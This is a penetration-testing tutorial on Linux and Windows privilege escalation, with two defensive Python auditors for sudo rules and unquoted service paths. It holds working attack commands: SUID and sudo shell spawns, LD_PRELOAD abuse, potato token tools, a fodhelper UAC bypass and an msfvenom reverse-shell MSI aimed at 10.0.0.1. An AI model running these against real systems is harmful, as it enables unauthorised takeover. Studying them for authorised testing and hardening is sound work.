Privilege Escalation

[Figure: a low-privilege user (user@system) escalating to Administrator / SYSTEM / root with full control. Common vectors: kernel exploits, SUID binaries, sudo misconfiguration, weak permissions, service exploits]

Privilege escalation is the process of exploiting vulnerabilities, misconfigurations, or weaknesses to gain elevated access on a system. This guide covers essential techniques for both Windows and Linux privilege escalation used in penetration testing.


Understanding Privilege Escalation

After gaining initial access to a system with limited privileges, attackers often need to escalate to administrator, root, or SYSTEM level access to achieve their objectives. Understanding these techniques is crucial for both offensive testing and defensive hardening.

Linux Privilege Escalation


Enumeration

# System information
uname -a
cat /etc/os-release
cat /proc/version

# User and group information
id
whoami
groups
cat /etc/passwd
cat /etc/group

# Sudo permissions
sudo -l

# SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null

# Running processes
ps aux
ps -ef

# Network connections
netstat -antup
ss -tunlp

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

SUID Exploitation

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Exploitable SUID binaries (GTFOBins)
# /usr/bin/find
find . -exec /bin/sh -p \; -quit

# /usr/bin/vim
vim -c ':!/bin/sh'

# /usr/bin/nmap (older versions)
nmap --interactive
!sh

# /usr/bin/perl
perl -e 'exec "/bin/sh";'

# /usr/bin/python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Custom SUID binary exploitation
# Check for buffer overflow or path hijacking

Sudo Exploitation

# Check sudo permissions
sudo -l

# Sudo with no password, e.g. when sudo -l shows:
#   (ALL : ALL) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/sh \; -quit

# Sudo with environment variables
sudo -E /path/to/script

# Sudo version vulnerabilities
# CVE-2021-3156 (Baron Samedit): an unpatched sudo answers "sudoedit: /: not a regular file",
# a patched one prints its usage message
sudoedit -s /

# LD_PRELOAD exploitation
# If env_keep+=LD_PRELOAD is set
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=./shell.so /any/allowed/binary
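
As an added defender-side example (not part of the original guide), the Python script below scans text shaped like `sudo -l` output for the conditions described in the SUID and sudo sections: NOPASSWD rules for the shell-capable binaries listed above, an unrestricted ALL, SETENV tags, and env_keep preserving LD_PRELOAD. The user, host and rules in the sample are constructed.

```python
import re

# Programs from the GTFOBins examples above: once runnable as root they hand out a shell
SHELL_CAPABLE = {"find", "vim", "nmap", "perl", "python", "python3"}
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def audit_sudo_l(output):
    """Scan text shaped like `sudo -l` output; return (severity, reason, line) findings."""
    findings = []
    in_defaults = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Matching Defaults") or line.startswith("User "):
            in_defaults = line.startswith("Matching Defaults")
            continue
        if in_defaults:
            # env_keep+=LD_PRELOAD lets the caller inject a library into every sudo-run program
            if re.search(r"env_keep\s*\+?=.*LD_(PRELOAD|LIBRARY_PATH)", line):
                findings.append(("HIGH", "env_keep preserves LD_PRELOAD/LD_LIBRARY_PATH", line))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmd = m.group("cmd").strip()
        prog = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the allowed program
        if cmd == "ALL":
            findings.append(("CRITICAL", "unrestricted ALL command", line))
        elif prog in SHELL_CAPABLE:
            sev = "CRITICAL" if "NOPASSWD" in tags else "HIGH"
            findings.append((sev, f"{prog} can spawn a shell", line))
        if "SETENV" in tags:
            findings.append(("HIGH", "SETENV lets the caller pass environment variables", line))
    return findings

# Constructed sample in the shape of `sudo -l` output (user, host and rules are made up)
SAMPLE = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD
User alice may run the following commands on web01:
    (ALL : ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim
    (ALL) SETENV: /opt/deploy/run.sh
"""

if __name__ == "__main__":
    for severity, reason, rule in audit_sudo_l(SAMPLE):
        print(f"[{severity}] {reason}: {rule}")
```

Feed it the saved output of `sudo -l` from each host to compare against a baseline; any CRITICAL line is a direct root path and should be rewritten to a specific, non-interactive command.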

Kernel Exploits

# Check kernel version
uname -r
cat /proc/version

# Common kernel exploits
# Dirty COW (CVE-2016-5195)
# DirtyCOW affects Linux kernel < 4.8.3 (fixed in 4.8.3, 4.7.9 and 4.4.26; distributions backported the fix)

# Dirty Pipe (CVE-2022-0847)
# Affects Linux 5.8+ (fixed in 5.16.11, 5.15.25 and 5.10.102)

# Search for exploits
searchsploit "linux kernel $(uname -r)"

# Linux Exploit Suggester
./linux-exploit-suggester.sh
./linux-smart-enumeration.sh

Windows Privilege Escalation

Enumeration

# System information
systeminfo
hostname
echo %USERNAME%

# User and group information
whoami /all
whoami /priv
net user
net localgroup administrators

# Running processes
tasklist /v
wmic process list full

# Installed software
wmic product get name,version
dir "C:\Program Files"

# Network information
ipconfig /all
netstat -ano

# Scheduled tasks
schtasks /query /fo LIST /v

# Services
net start
wmic service list brief
sc query

Token Impersonation

# Check privileges
whoami /priv

# SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
# Use Juicy Potato (Windows Server 2016 and older)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami > C:\temp\output.txt" -t *

# Use PrintSpoofer (Windows 10/Server 2019+)
PrintSpoofer.exe -i -c cmd

# Use RoguePotato
RoguePotato.exe -r 10.0.0.1 -e "cmd.exe" -l 9999

# Metasploit incognito
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

Unquoted Service Paths

# Find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Example vulnerable path:
# C:\Program Files\Some Service\service.exe
# Windows tries: C:\Program.exe, C:\Program Files\Some.exe

# Check write permissions
icacls "C:\Program Files\Some Service"

# Place malicious executable
copy payload.exe "C:\Program Files\Some.exe"

# Restart service
sc stop vulnerableservice
sc start vulnerableservice
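
As an added example (not from the original guide), this Python script applies the search order described above to the output of the wmic query, so the audit can be run offline on collected output: for each auto-start service with an unquoted path containing spaces, it lists the directories whose write ACLs the icacls step must check. The service names and paths in the sample are constructed; columns are assumed to be padded with two or more spaces, as in wmic's default table output.

```python
import ntpath
import re

def service_candidates(image_path):
    """Executables CreateProcess tries, in order, for an unquoted image path containing spaces.
    Anything after the first .exe is treated as arguments and ignored (heuristic)."""
    m = re.search(r"\.exe", image_path, re.I)
    exe = image_path[:m.end()] if m else image_path.strip()
    cands = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    return cands + [exe]

def unquoted_path_findings(wmic_output):
    """Parse text shaped like `wmic service get name,pathname,startmode` and return, for each
    auto-start service with an unquoted path containing spaces, the directories where a
    hijacking executable could be placed (these are what icacls must show as non-writable)."""
    findings = {}
    for line in wmic_output.splitlines()[1:]:          # skip the header row
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 3:
            continue
        name, path, start = cols[0], cols[1], cols[-1]
        if start.lower() != "auto" or path.startswith('"'):
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue                                     # same exclusion as the findstr filter above
        cands = service_candidates(path)
        if len(cands) > 1:                               # at least one space in the path
            findings[name] = [ntpath.dirname(c) for c in cands[:-1]]
    return findings

# Constructed sample in the shape of the wmic query's default table output
SAMPLE = """\
Name       PathName                                                StartMode
VulnSvc    C:\\Program Files\\Some Service\\service.exe               Auto
SafeSvc    "C:\\Program Files\\Other Vendor\\agent.exe" --service     Auto
Spooler    C:\\Windows\\System32\\spoolsv.exe                         Auto
ManualSvc  C:\\Tools\\My App\\app.exe                                 Manual
"""

if __name__ == "__main__":
    for svc, dirs in unquoted_path_findings(SAMPLE).items():
        print(svc, "-> audit write ACLs on:", dirs)
```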

AlwaysInstallElevated

# Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 0x1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f msi -o payload.msi

# Install with elevated privileges
msiexec /quiet /qn /i payload.msi

UAC Bypass

# Check UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

# Fodhelper UAC bypass
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"

# ComputerDefaults UAC bypass
# Event Viewer UAC bypass
# sdclt UAC bypass

Automated Enumeration Tools

Linux Tools

  • LinPEAS: Comprehensive Linux privilege escalation scanner
  • LinEnum: Scripted local Linux enumeration
  • Linux Smart Enumeration (LSE): Color-coded privilege escalation info
  • pspy: Monitor processes without root permissions

Windows Tools

  • WinPEAS: Windows privilege escalation scanner
  • PowerUp: PowerShell privilege escalation framework
  • Seatbelt: C# security-oriented enumeration tool
  • SharpUp: C# port of PowerUp
  • Windows Exploit Suggester: Identifies missing patches

# Run WinPEAS
winPEASx64.exe

# Run LinPEAS
./linpeas.sh

# PowerUp
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

# Seatbelt
Seatbelt.exe -group=all

Ethical Use Only

Privilege escalation techniques should only be used in authorized penetration testing engagements with proper written permission. Unauthorized system access is illegal.

HackHub Professional Services


Expert Privilege Escalation Testing

The HackHub team provides comprehensive privilege escalation assessments for both Windows and Linux environments. With over 10 years of experience, we identify configuration weaknesses, missing patches, and privilege escalation vectors that could be exploited by attackers.

Our Services:

  • Windows Privilege Escalation Assessment
  • Linux Privilege Escalation Testing
  • Active Directory Security Review
  • System Hardening Consultation

Contact [email protected] for professional security services.

Defense Recommendations

  • Patch Management: Keep systems and software up to date
  • Least Privilege: Users should have minimum necessary permissions
  • Application Whitelisting: Control what can execute
  • Disable Unnecessary Services: Reduce attack surface
  • UAC Settings: Configure appropriately for environment
  • File Permissions: Audit and fix weak permissions
  • Monitoring: Detect privilege escalation attempts
  • Remove Dangerous Privileges: SeImpersonate, SeDebug when not needed

Conclusion

Privilege escalation is a critical phase in penetration testing that reveals how an attacker with limited access can gain complete control of a system. Understanding these techniques helps security professionals identify and remediate vulnerabilities before they can be exploited. Regular security assessments and proper system hardening are essential for preventing privilege escalation attacks.